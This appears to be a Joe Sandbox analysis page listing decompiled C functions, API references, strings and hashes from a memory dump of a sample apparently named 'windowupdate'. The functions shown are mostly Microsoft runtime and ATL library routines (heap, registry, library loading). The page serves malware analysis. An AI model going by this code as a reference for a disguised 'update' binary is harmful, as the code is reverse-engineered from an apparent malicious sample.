                      Function 00D9CA20 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 96memoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E00D9CA20(void* __ecx, void* _a4, signed int _a8) {
				long _v8;
				long _v12;
				signed int _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _t27;
				intOrPtr _t33;
				signed char _t36;
				void* _t44;
				void* _t45;
				void* _t50;
				void* _t53;

				_t45 = __ecx;
				if(_a4 == 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_v12 = _v8;
				_t57 = _v12;
				if(_v12 == 0) {
					_t44 = L00D84930(_t57, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\expand.cpp", 0x3e, 0, L"%ls", L"block != nullptr");
					_t53 = _t53 + 0x18;
					if(_t44 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					__eflags = _a8 - 0xffffffe0;
					if(_a8 <= 0xffffffe0) {
						_t27 =  *0xf21510; // 0x1050000
						_v28 = HeapSize(_t27, 0, _a4);
						__eflags = _a8;
						if(_a8 != 0) {
							_v16 = _a8;
						} else {
							_v16 = 1;
						}
						_v24 = _v16;
						_t47 = _a4;
						_t50 =  *0xf21510; // 0x1050000
						_v20 = HeapReAlloc(_t50, 0x10, _a4, _v24);
						__eflags = _v20;
						if(_v20 == 0) {
							__eflags = _v24 - _v28;
							if(_v24 > _v28) {
								L18:
								_t33 = E00D82E90(_t47, GetLastError());
								 *((intOrPtr*)(L00D82F70(_t47))) = _t33;
								__eflags = 0;
								return 0;
							}
							_t47 = _v28;
							_t36 = E00D9C9A0(_v28);
							_t53 = _t53 + 4;
							__eflags = _t36 & 0x000000ff;
							if((_t36 & 0x000000ff) != 0) {
								goto L18;
							}
							return _a4;
						} else {
							return _v20;
						}
					}
					 *((intOrPtr*)(L00D82F70(_t45))) = 0xc;
					return 0;
				} else {
					 *((intOrPtr*)(L00D82F70(_t45))) = 0x16;
					E00D82900(L"block != nullptr", L"_expand_base", L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\expand.cpp", 0x3e, 0);
					return 0;
				}
			}
















                      0x00d9ca20
                      0x00d9ca2d
                      0x00d9ca38
                      0x00d9ca2f
                      0x00d9ca2f
                      0x00d9ca2f
                      0x00d9ca42
                      0x00d9ca45
                      0x00d9ca49
                      0x00d9ca60
                      0x00d9ca65
                      0x00d9ca6b
                      0x00d9ca6d
                      0x00d9ca6d
                      0x00d9ca6b
                      0x00d9ca72
                      0x00d9caa1
                      0x00d9caa5
                      0x00d9cabf
                      0x00d9cacb
                      0x00d9cace
                      0x00d9cad2
                      0x00d9cae0
                      0x00d9cad4
                      0x00d9cad4
                      0x00d9cad4
                      0x00d9cae6
                      0x00d9caed
                      0x00d9caf3
                      0x00d9cb00
                      0x00d9cb03
                      0x00d9cb07
                      0x00d9cb11
                      0x00d9cb14
                      0x00d9cb2e
                      0x00d9cb35
                      0x00d9cb44
                      0x00d9cb46
                      0x00000000
                      0x00d9cb46
                      0x00d9cb16
                      0x00d9cb1a
                      0x00d9cb1f
                      0x00d9cb25
                      0x00d9cb27
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9cb09
                      0x00000000
                      0x00d9cb09
                      0x00d9cb07
                      0x00d9caac
                      0x00000000
                      0x00d9ca74
                      0x00d9ca79
                      0x00d9ca92
                      0x00000000
                      0x00d9ca9a

                      APIs
                      • HeapSize.KERNEL32(01050000,00000000,00000000), ref: 00D9CAC5
                      • HeapReAlloc.KERNEL32(01050000,00000010,00000000,?), ref: 00D9CAFA
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Heap$AllocSize
                      • String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
                      • API String ID: 3906553864-3244948836
                      • Opcode ID: b9bb28fc481e957b2da72280469326c37e75c87f5e36df6a6b010474b26e6733
                      • Instruction ID: 55bdbdc616bd160ec1b27bf02b7e9245706a0855aeeede9724184ce805fbc544
                      • Opcode Fuzzy Hash: b9bb28fc481e957b2da72280469326c37e75c87f5e36df6a6b010474b26e6733
                      • Instruction Fuzzy Hash: 67316B70D1020DEFDF20EFA4D846BAEB7B0EB44744F149559E505AB281D3B59A40DBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D42030 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92COMMON
                      Download Yara Rule
                      C-Code - Quality: 57%
                      			E00D42030(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v24;
				void* _t33;
				intOrPtr _t37;
				void* _t40;
				void* _t41;
				void* _t46;
				void* _t64;
				void* _t68;
				void* _t69;

				_t64 = __edi;
				_t47 = __ebx;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = E00D33B30(__ebx, 0xf23710, __eflags);
				_t72 = _v8;
				if(_v8 == 0) {
					_t46 = L00D84930(_t72, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf2f, 0, L"%ls", L"pThis != 0");
					_t69 = _t69 + 0x18;
					if(_t46 == 1) {
						asm("int3");
					}
				}
				if(_v8 != 0) {
					 *((intOrPtr*)(_v8 + 4)) = _a4;
					_t66 = _t69;
					_t33 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 8))))();
					__eflags = _t69 - _t69;
					E00D3C490(_v8 + 8, __eflags, E00DC1520(_t33, __eflags), _v8);
					_v12 = E00D3C4D0(_v8 + 8, __eflags);
					_t37 = E00D3C3E0(_t69, _a4, 4, _v12);
					_t69 = _t69 + 0xc;
					_v16 = _t37;
					__eflags = _v16 - E00D42030;
					if(__eflags != 0) {
						_push("Subclassing through a hook discarded.\n");
						_push(0);
						_push(E00D3F1E0(0xf23748));
						_push(E00D323B0( &_v24, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf3e));
						E00D323E0(_t47, _t64, _t66, __eflags);
						_t69 = _t69 + 0x10;
					}
					_t40 = _v12(_a4, _a8, _a12, _a16);
					__eflags = _t69 - _t69;
					_t41 = E00DC1520(_t40, __eflags);
				} else {
					_t41 = 0;
				}
				return E00DC1520(_t41, _t68 - _t69 + 0x14);
			}
















                      0x00d42030
                      0x00d42030
                      0x00d4203c
                      0x00d4203f
                      0x00d42042
                      0x00d42045
                      0x00d42048
                      0x00d42055
                      0x00d42058
                      0x00d4205c
                      0x00d42076
                      0x00d4207b
                      0x00d42081
                      0x00d42083
                      0x00d42083
                      0x00d42081
                      0x00d42088
                      0x00d42097
                      0x00d420a3
                      0x00d420ab
                      0x00d420ad
                      0x00d420bb
                      0x00d420cb
                      0x00d420d8
                      0x00d420dd
                      0x00d420e0
                      0x00d420e3
                      0x00d420ea
                      0x00d420ec
                      0x00d420f1
                      0x00d420fd
                      0x00d42110
                      0x00d42111
                      0x00d42116
                      0x00d42116
                      0x00d4212b
                      0x00d4212e
                      0x00d42130
                      0x00d4208a
                      0x00d4208a
                      0x00d4208a
                      0x00d42143

                      APIs
                      • ___InlineInterlockedCompareExchangePointer.VCCORLIBD ref: 00D420D8
                      • _Smanip.LIBCPMTD ref: 00D4210B
                      Strings
                      • pThis != 0, xrefs: 00D4205E
                      • Subclassing through a hook discarded., xrefs: 00D420EC
                      • %ls, xrefs: 00D42063
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D42103
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D4206F
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CompareExchangeInlineInterlockedPointerSmanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$Subclassing through a hook discarded.$pThis != 0
                      • API String ID: 2445389785-534117427
                      • Opcode ID: a2d504e8f27c990da4151e1e06604ced7d01949bceee03a1be20a75bbd117f7e
                      • Instruction ID: 413a9af892f5eb6804a379950296c9ade35e99e48bc67c00902f5aa7c59c0336
                      • Opcode Fuzzy Hash: a2d504e8f27c990da4151e1e06604ced7d01949bceee03a1be20a75bbd117f7e
                      • Instruction Fuzzy Hash: 7E318FB5E00208BFCB04EFA8C952BAEB7B4EF48704F144558F505A7282D670AF40DBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D34840 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 69%
                      			E00D34840(void** __ecx, void* __esi, char* _a4, char* _a8, int _a12) {
				void** _v8;
				int _v12;
				int _v16;
				void* _t22;
				long _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t41;
				void* _t42;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t44 =  *_v8;
					if( *_v8 == 0) {
						_t31 = L00D84930(_t44, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1877, 0, "%ls", L"m_hKey != 0");
						_t42 = _t42 + 0x18;
						if(_t31 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				L5:
				L5:
				if(_a8 == 0) {
					_v16 = 0;
				} else {
					_v16 = 1;
				}
				_v12 = _v16;
				_t48 = _v12;
				if(_v12 == 0) {
					_t30 = L00D84930(_t48, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1878, 0, "%ls", L"__atl_condVal");
					_t42 = _t42 + 0x18;
					if(_t30 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					goto L13;
				}
				_t27 = 0xd;
				L19:
				return E00DC1520(_t27, _t41 - _t42 + 0xc);
				L13:
				__eflags = 0;
				if(0 != 0) {
					goto L5;
				}
				__eflags = _a12 - 1;
				if(_a12 != 1) {
					__eflags = _a12 - 2;
					if(__eflags != 0) {
						_t29 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1879, 0, "%ls", L"(dwType == ( 1ul )) || (dwType == ( 2ul ))");
						_t42 = _t42 + 0x18;
						__eflags = _t29 - 1;
						if(_t29 == 1) {
							asm("int3");
						}
					}
				}
				_t22 = E00D82E00(_a8);
				_t42 = _t42 + 4;
				_t26 = RegSetValueExA( *_v8, _a4, 0, _a12, _a8, _t22 + 1);
				__eflags = _t42 - _t42;
				_t27 = E00DC1520(_t26, __eflags);
				goto L19;
			}














                      0x00d34847
                      0x00d3484e
                      0x00d34855
                      0x00d3485c
                      0x00d3485f
                      0x00d34862
                      0x00d34865
                      0x00d3487f
                      0x00d34884
                      0x00d3488a
                      0x00d3488c
                      0x00d3488c
                      0x00d3488a
                      0x00d3488d
                      0x00000000
                      0x00d34891
                      0x00d34895
                      0x00d348a0
                      0x00d34897
                      0x00d34897
                      0x00d34897
                      0x00d348aa
                      0x00d348ad
                      0x00d348b1
                      0x00d348cb
                      0x00d348d0
                      0x00d348d6
                      0x00d348d8
                      0x00d348d8
                      0x00d348d6
                      0x00d348dd
                      0x00000000
                      0x00000000
                      0x00d348df
                      0x00d34950
                      0x00d3495d
                      0x00d348e6
                      0x00d348e6
                      0x00d348e8
                      0x00000000
                      0x00000000
                      0x00d348ea
                      0x00d348ee
                      0x00d348f0
                      0x00d348f4
                      0x00d3490e
                      0x00d34913
                      0x00d34916
                      0x00d34919
                      0x00d3491b
                      0x00d3491b
                      0x00d34919
                      0x00d348f4
                      0x00d34920
                      0x00d34925
                      0x00d34942
                      0x00d34948
                      0x00d3494a
                      0x00000000

                      APIs
                      • _strlen.LIBCMT ref: 00D34920
                      • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,00000000,-00000001), ref: 00D34942
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Value_strlen
                      • String ID: %ls$(dwType == ( 1ul )) || (dwType == ( 2ul ))$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$__atl_condVal$m_hKey != 0
                      • API String ID: 3056571664-2957920586
                      • Opcode ID: 3cfe50dec5e056c9c9662e13d788d90a1caba3a3cbeb762404f5f3908da29696
                      • Instruction ID: 72aa554d054ed5b17dfa7a887cbca3f3d9f10a9843cff8c1831cc5dc2c70d203
                      • Opcode Fuzzy Hash: 3cfe50dec5e056c9c9662e13d788d90a1caba3a3cbeb762404f5f3908da29696
                      • Instruction Fuzzy Hash: 5031C175E40349BFDB20BF89DC47FAE7364AB11704F188168F504662C1E2B8AA548BB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9D8A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 91COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D9D8A0(signed int __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				void* _t35;
				void* _t38;
				signed int _t55;
				void* _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t55 = __ecx;
				_t35 = E00D84020( &_a4);
				_t76 = _t75 + 4;
				_v16 = _t35 + 1;
				if(_v16 <= (_t55 | 0xffffffff) - _a12) {
					_v12 = _a12 + _v16 + 1;
					_t38 = L00D892C0(_a12 + _v16 + 1, __edi, _v12, 1, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x98);
					_t77 = _t76 + 0x14;
					E00D4BF60( &_v8, _t38);
					if(_a12 > 0) {
						_v20 = E00D4C0C0( &_v8);
						E00D84A20(E00D9E240( &_v20,  &_v12,  &_a8,  &_a12), _t52, L"traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)", L"copy_and_add_argument_to_buffer", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x9c, 0);
						_t77 = _t77 + 0x28;
					}
					_v24 = _v12 - _a12;
					_v28 = E00D4C0C0( &_v8) + _a12;
					E00D84A20(E00D9E270( &_v28,  &_v24,  &_a4,  &_v16), _t43, L"traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)", L"copy_and_add_argument_to_buffer", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0xa3, 0);
					_v32 = E00D9E8C0(_a16, _t74, E00D8C129( &_v8));
					E00D4BFA0( &_v8);
					return _v32;
				}
				return 0xc;
			}
















                      0x00d9d8a0
                      0x00d9d8a0
                      0x00d9d8ac
                      0x00d9d8b1
                      0x00d9d8b7
                      0x00d9d8c3
                      0x00d9d8d9
                      0x00d9d8ee
                      0x00d9d8f3
                      0x00d9d8fa
                      0x00d9d903
                      0x00d9d90d
                      0x00d9d93f
                      0x00d9d944
                      0x00d9d944
                      0x00d9d94d
                      0x00d9d95b
                      0x00d9d98d
                      0x00d9d9a6
                      0x00d9d9ac
                      0x00000000
                      0x00d9d9b1
                      0x00000000

                      APIs
                        • Part of subcall function 00D84020: _strlen.LIBCMT ref: 00D8402B
                      • __invoke_watson_if_error.LIBCMTD ref: 00D9D93F
                      • __invoke_watson_if_error.LIBCMTD ref: 00D9D98D
                      Strings
                      • traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count), xrefs: 00D9D96F
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00D9D8E1
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00D9D917, 00D9D965
                      • traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length), xrefs: 00D9D921
                      • copy_and_add_argument_to_buffer, xrefs: 00D9D91C, 00D9D96A
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __invoke_watson_if_error$_strlen
                      • String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
                      • API String ID: 4131775925-1477255430
                      • Opcode ID: ef9edbf28aa2ed662b9203efca525713223a7009505c0a8356bb6b983fa10628
                      • Instruction ID: 404ef1cbd96be68279957104bad7cdd87b4c97465dd08d24d16c0a8a77698ed1
                      • Opcode Fuzzy Hash: ef9edbf28aa2ed662b9203efca525713223a7009505c0a8356bb6b983fa10628
                      • Instruction Fuzzy Hash: 5B315EB6D40209FBCB04EFA0CC92EEE7778EB54314F00455AB91166282EB70A718CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D321A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 75COMMON
                      Download Yara Rule
                      C-Code - Quality: 30%
                      			E00D321A0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v268;
				char _v272;
				signed int _t14;
				signed int _t15;
				void* _t23;
				void* _t26;
				void* _t34;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				signed int _t44;
				void* _t45;
				void* _t46;

				_t43 = __esi;
				_t34 = __edx;
				_t26 = __ebx;
				_t41 =  &_v272;
				memset(_t41, 0xcccccccc, 0x43 << 2);
				_t46 = _t45 + 0xc;
				_t42 = _t41 + 0x43;
				_t14 =  *0xdf600c; // 0x71e60372
				_t15 = _t14 ^ _t44;
				_v8 = _t15;
				if(_a4 != 0) {
					__eflags =  *0xf23670 - 0x20;
					if( *0xf23670 < 0x20) {
						 *((intOrPtr*)(0xf215f0 +  *0xf23670 * 0x104)) = _a8;
						E00D4AF80(_t42,  &_v268, 0, 0x100);
						E00D31490(__eflags,  &_v268, 0x7f, L"%hs", _a4);
						_t34 = 0xf215f4 +  *0xf23670 * 0x104;
						E00D82600(_t34, 0x7f,  &_v268);
						_t46 = _t46 + 0x28;
						_t15 =  *0xf23670 + 1;
						__eflags = _t15;
						 *0xf23670 = _t15;
					} else {
						_t15 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t15 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltrace.h", 0x151, 0, "%ls", L"false && \"Too many categories defined\"");
							_t46 = _t46 + 0x18;
							__eflags = 0 - 1;
							if(0 == 1) {
								asm("int3");
							}
						}
					}
				}
				E00DC14C0(_t44, 0xd322a8);
				_t23 = _t15;
				_t39 = _t34;
				return E00DC1520(E00D47280(_t23, _t26, _v8 ^ _t44, _t39, _t42, _t43), _t44 - _t46 + 0x10c);
			}


















                      0x00d321a0
                      0x00d321a0
                      0x00d321a0
                      0x00d321aa
                      0x00d321ba
                      0x00d321ba
                      0x00d321ba
                      0x00d321bc
                      0x00d321c1
                      0x00d321c3
                      0x00d321ca
                      0x00d321d1
                      0x00d321d8
                      0x00d32213
                      0x00d32227
                      0x00d32241
                      0x00d3225c
                      0x00d32263
                      0x00d32268
                      0x00d32270
                      0x00d32270
                      0x00d32273
                      0x00d321da
                      0x00d321da
                      0x00d321da
                      0x00d321dc
                      0x00d321f6
                      0x00d321fb
                      0x00d321fe
                      0x00d32201
                      0x00d32203
                      0x00d32203
                      0x00d32201
                      0x00d32204
                      0x00d321d8
                      0x00d32282
                      0x00d32287
                      0x00d32288
                      0x00d322a4

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32282
                      Strings
                      • false && "Too many categories defined", xrefs: 00D321DE
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltrace.h, xrefs: 00D321EF
                      • %hs, xrefs: 00D32233
                      • %ls, xrefs: 00D321E3
                      • atlTraceGeneral, xrefs: 00D3225C
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %hs$%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltrace.h$atlTraceGeneral$false && "Too many categories defined"
                      • API String ID: 930174750-274957755
                      • Opcode ID: 5924d095d22248c6c34c59cd41ecd5685b0598c7276949b9bbd356f1c5eb3229
                      • Instruction ID: 59fe3c334b9b8631cca401622c59a70cbab7ee82c96eb84e126519f245786936
                      • Opcode Fuzzy Hash: 5924d095d22248c6c34c59cd41ecd5685b0598c7276949b9bbd356f1c5eb3229
                      • Instruction Fuzzy Hash: CB2131B5E042047FDB14EB14EC43FF97368EB50704F404259F9455B2C2EBF5A6848AB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D93670 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D93670(void* __ecx, WCHAR* _a4) {
				struct HINSTANCE__* _v8;

				_v8 = LoadLibraryExW(_a4, 0, 0x800);
				if(_v8 == 0) {
					if(GetLastError() != 0x57 || E00D92BC0(_a4, L"api-ms-", 7) == 0 || E00D92BC0(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					} else {
						return LoadLibraryExW(_a4, 0, 0);
					}
				}
				return _v8;
			}




                      0x00d93687
                      0x00d9368e
                      0x00d9369e
                      0x00000000
                      0x00d936ce
                      0x00000000
                      0x00d936d6
                      0x00d9369e
                      0x00000000

                      APIs
                      • LoadLibraryExW.KERNEL32(00D93569,00000000,00000800,?,?,00D93569,00000000), ref: 00D93681
                      • GetLastError.KERNEL32(?,?,00D93569), ref: 00D93695
                      • _wcsncmp.LIBCMTD ref: 00D936AB
                      • _wcsncmp.LIBCMTD ref: 00D936C2
                      • LoadLibraryExW.KERNEL32(00D93569,00000000,00000000,?,?,?,?,00D93569), ref: 00D936D6
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: LibraryLoad_wcsncmp$ErrorLast
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 180994465-537541572
                      • Opcode ID: 97d5f6365fec4f7d5572bbf508e317190337378f64b689c5fa46882306a058c3
                      • Instruction ID: 9aad06c62008e5bb136918a9ce9cc1d311c1d854faf3918be0b85e683625a68d
